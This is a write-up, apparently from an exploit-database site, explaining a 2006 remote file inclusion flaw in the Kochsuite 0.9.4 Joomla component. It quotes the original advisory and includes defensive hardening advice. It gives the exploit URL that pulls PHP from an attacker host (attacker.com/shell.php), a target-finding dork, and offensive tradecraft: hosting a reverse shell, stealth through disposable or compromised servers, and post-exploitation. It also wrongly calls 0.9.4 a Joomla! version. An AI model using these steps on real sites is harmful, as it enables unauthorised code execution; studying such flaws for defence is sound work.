By exploitdb papers bot•August 18, 2006•

papers

Understanding Joomla! Kochsuite RFI: A Historical Exploit Deep Dive

What this paper is

This paper, published in 2006, details a Remote File Inclusion (RFI) vulnerability in the Joomla! (then Mambo/Joomla CMS) component called Kochsuite, specifically version 0.9.4. The vulnerability allows an attacker to include and execute arbitrary PHP code from a remote server by manipulating a configuration parameter.

Simple technical breakdown

The Kochsuite component, when processing its configuration, incorrectly handles a variable named mosConfig_absolute_path. Instead of ensuring this path is a local file on the server, it directly uses it in a require_once statement. If an attacker can control mosConfig_absolute_path to point to a URL on a server they control, they can trick the Joomla! site into downloading and executing a PHP file from that remote server. This effectively allows arbitrary code execution on the vulnerable Joomla! server.

Complete code and payload walkthrough

The provided exploit paper does not contain executable code or shellcode in the traditional sense. Instead, it describes the vulnerable code snippet and shows how to craft a URL to trigger the vulnerability.

Here's a breakdown of the relevant parts from the paper:

Vulnerable Code Snippet (Lines 46-47 of config.kochsuite.php):

# Don't allow direct linking defined( '_VALID_MOS' ) or
die( 'Direct Access to this location is not allowed.' );

require_once ($mosConfig_absolute_path.'/administrator/
components/com_kochsuite/includes/letters.inc');

defined( '_VALID_MOS' ) or die( 'Direct Access to this location is not allowed.' );: This is a standard Joomla! security check to prevent direct access to component files. It checks if a constant _VALID_MOS is defined, which is typically done by the Joomla! core when loading components legitimately. If not defined, it exits.
require_once ($mosConfig_absolute_path.'/administrator/components/com_kochsuite/includes/letters.inc');: This is the core of the vulnerability. It attempts to include a file.
- $mosConfig_absolute_path: This variable is supposed to hold the absolute path to the Joomla! installation's root directory. However, in this vulnerable version, it's not properly sanitized or validated.
- The code concatenates this path with a relative path to a file named letters.inc.

Exploit URL Structure:

http://[sitepath]/[joomlapath]/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://huh?

http://[sitepath]/[joomlapath]/administrator/components/com_kochsuite/config.kochsuite.php: This is the URL of the vulnerable script within the Kochsuite component.
?mosConfig_absolute_path=http://huh?: This is the crucial part.
- mosConfig_absolute_path=: This parameter is passed to the config.kochsuite.php script.
- http://huh?: This is the attacker-controlled value. When the script processes this parameter, it assigns http://huh? to $mosConfig_absolute_path.
- The require_once statement then becomes: require_once ('http://huh?/administrator/components/com_kochsuite/includes/letters.inc');.
- PHP's require_once function, when given a URL (starting with http:// or https://), will attempt to fetch the content from that URL and execute it as PHP code if the allow_url_fopen directive is enabled in the server's PHP configuration.

Mapping of Code Fragment/Block to Practical Purpose:

defined( '_VALID_MOS' ) or die(...): Security check, bypassed by direct URL access to config.kochsuite.php.
require_once ($mosConfig_absolute_path.'/administrator/components/com_kochsuite/includes/letters.inc');: The vulnerable function call that leads to RFI.
$mosConfig_absolute_path: The input variable that is not properly validated, allowing remote URLs.
mosConfig_absolute_path=http://attacker.com/shell.txt: The crafted URL parameter that exploits the vulnerability.

Payload Execution Stages (Conceptual):

Initial Request: Attacker sends a crafted HTTP GET request to the vulnerable Joomla! site.
Parameter Injection: The mosConfig_absolute_path parameter is set to a URL pointing to an attacker-controlled server.
Remote File Fetch: The vulnerable config.kochsuite.php script, due to improper validation and allow_url_fopen being enabled, attempts to require_once the remote URL.
Code Execution: If the remote URL points to a PHP file (e.g., shell.txt containing PHP code), PHP on the victim server fetches this file and executes it.
Shell Access/Action: The executed remote code can then perform actions on the victim server, such as establishing a reverse shell, downloading further malware, or exfiltrating data.

Note on "Payload Bytes": This exploit relies on the PHP allow_url_fopen setting and the require_once function's behavior with URLs. There are no specific shellcode bytes provided in the paper itself, as the "payload" is the content of a remote PHP file.

Practical details for offensive operations teams

Required Access Level: Unauthenticated access to the target web application.
Lab Preconditions:
- A target Joomla! installation with the Kochsuite component (version 0.9.4 or a similarly vulnerable version) installed.
- The allow_url_fopen directive must be enabled in the target server's PHP configuration. This is a common default but can be disabled by security-conscious administrators.
- An attacker-controlled web server capable of serving PHP files.
Tooling Assumptions:
- A web browser for manual testing or a scripting language (like Python with requests, or curl) for automation.
- A simple web server (e.g., Python's http.server, Apache, Nginx) to host the malicious PHP payload.
Execution Pitfalls:
- allow_url_fopen disabled: If this PHP directive is off, the RFI will not work. The attacker would need to look for alternative vulnerabilities or methods to achieve code execution.
- Firewall/WAF blocking: Network firewalls or Web Application Firewalls (WAFs) might block requests to external URLs or detect the RFI pattern.
- Incorrect mosConfig_absolute_path handling: Later versions of Joomla! or the Kochsuite component might have patched this specific vulnerability, or the require_once might be guarded by stricter checks.
- Payload not being PHP: If the attacker points to a non-PHP file, it will likely be downloaded and displayed (or ignored) but not executed as code.
- URL encoding issues: Special characters in the attacker's domain or payload path might need URL encoding.
Tradecraft Considerations:
- Reconnaissance: Identify the target CMS (Joomla!) and look for the com_kochsuite component. The dork inurl:"com_kochsuite" provided in the paper is a good starting point for search engines.
- Payload Hosting: Host a simple PHP reverse shell or a file containing commands like phpinfo(); on a reliable server.
- Stealth: Initial RFI attempts might be logged. Consider using a disposable IP or a compromised server for hosting the payload initially.
- Post-Exploitation: Once code execution is achieved, the immediate goal is often to establish a more stable shell (e.g., reverse shell) and then escalate privileges or move laterally.

Where this was used and when

This vulnerability was published in August 2006. It targets older versions of Joomla! (specifically version 0.9.4) and its components. At the time, Joomla! was a popular CMS, and vulnerabilities in its components were frequently exploited. This type of RFI was a common attack vector against PHP-based web applications in the mid-2000s. It's unlikely this specific version of Kochsuite is still in widespread use, but the technique of RFI was prevalent and has been seen in various forms across many web applications.

Defensive lessons for modern teams

Input Validation is Paramount: Never trust user-supplied input, especially when it's used in file operations or dynamic code execution. Always validate and sanitize all external inputs.
Disable allow_url_fopen and allow_url_include: These PHP directives are often unnecessary for legitimate application functionality and pose significant security risks. Disabling them is a critical hardening step.
Keep Software Updated: Regularly update CMS core, themes, and all installed components/plugins. Vendors patch these vulnerabilities, and running outdated software is a primary attack vector.
Web Application Firewalls (WAFs): Deploy and properly configure WAFs to detect and block common attack patterns like RFI, SQLi, and XSS.
Secure Configuration: Review PHP configurations and server settings for security best practices.
Least Privilege: Ensure web server processes run with the minimum necessary privileges.
Monitoring and Logging: Implement robust logging for web server access and PHP errors. Monitor these logs for suspicious activity, such as requests to external resources or unusual file inclusions.

ASCII visual (if applicable)

+-----------------+      +-----------------------+      +---------------------+
| Attacker Server |----->| Target Joomla! Server |----->| Vulnerable Component|
| (Payload Host)  |      | (Victim)              |      | (Kochsuite)         |
+-----------------+      +-----------+-----------+      +---------------------+
        ^                          |
        |                          |  HTTP Request with
        |                          |  mosConfig_absolute_path=http://attacker.com/shell.php
        |                          v
        |                  +---------------------+
        |                  | PHP Interpreter     |
        |                  | (allow_url_fopen=On)|
        |                  +----------+----------+
        |                             |  require_once() fetches and executes
        |                             |  remote PHP code
        +-----------------------------+

This diagram illustrates the flow: the attacker's server hosts the malicious PHP file. The attacker sends a request to the vulnerable Joomla! server, tricking the Kochsuite component into fetching and executing the PHP code from the attacker's server via the require_once function.

Source references

Paper: Joomla! Component Kochsuite 0.9.4 - Remote File Inclusion
Author: camino
Published: 2006-08-18
Exploit-DB URL: https://www.exploit-db.com/papers/2215
Original Paper Source: Provided in the prompt.

Original Exploit-DB Content (Verbatim)

.:[ insecurity research team ]:.
     .__..____.:.______.____.:.____ .
 .:. |  |/    \:/  ___// __ \:/   _\.:.
   : |  |   |  \\____\\  ___/\   /__ :. .
 ..: |__|___|  /____  >\___  >\___  >.:
   .:.. ..  .\/   .:\/:.  .\/.  .:\/:
 .   ...:.    .advisory.    .:...
         :..................: 18.o8.2oo6 ..
 
 
  Affected Application: Kochsuite v0.9.4

       (Mambo/Joomla CMS Component)
 
 
 . . :[ contact ]: . . . . . . . . . . . . . . . . . . . . . . . . . . .
 
 
  Discoverd by: camino
 
  Team: Insecurity Research Team
 
  URL: http://www.insecurityresearch.org
 
  E-Mail: camino[at]sexmagnet[dot]com
 
 
 
 . . :[ insecure application details ]: . . . . . . . . . . . . . . . . .
 
 
  Typ: Remote [x]  Local [ ]
 
       Remote File Inclusion [x]  SQL Injection [ ]
 
  Level: Low [ ]  Middle [x]  High [ ]
 
  Application: Kochsuite
 
  Version: 0.9.4
 
  Vulnerable File: config.kochsuite.php
 
  URL: http://www.vegisto.com
 
  Description: It's a component for chiefs to publish theirs stuff...
 
  Dork: inurl:"com_kochsuite"
 
 
 
 . . :[ exploit ]: . . . . . . . . . . . . . . . . . . . . . . . . . . .


  http://[sitepath]/[joomlapath]/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://huh?
 
 
 . . :[ how to fix ]: . . . . . . . . . . . . . . . . . . . . . . . . . .
 
 
  o1.) open config.kochsuite.php
 
  o2.) take a look at line 46:

         # Don't allow direct linking    defined( '_VALID_MOS' ) or 

         die( 'Direct Access to this location is not allowed.' );

  o3.) take a look at line 47:

         require_once ($mosConfig_absolute_path.'/administrator/

         components/com_kochsuite/includes/letters.inc');
 
  o4.) change line 46:

         defined( '_VALID_MOS' ) or 

         die( 'Direct Access to this location is not allowed.' );
 
 
 
 . . :[ greets ]: . . . . . . . . . . . . . . . . . . . . . . . . . . . .
 
 
  my girlfriend, brOmstar, ACiDAngel, PoKi, Waze and all the sexy members of insecurity research team ;-)

# milw0rm.com [2006-08-18]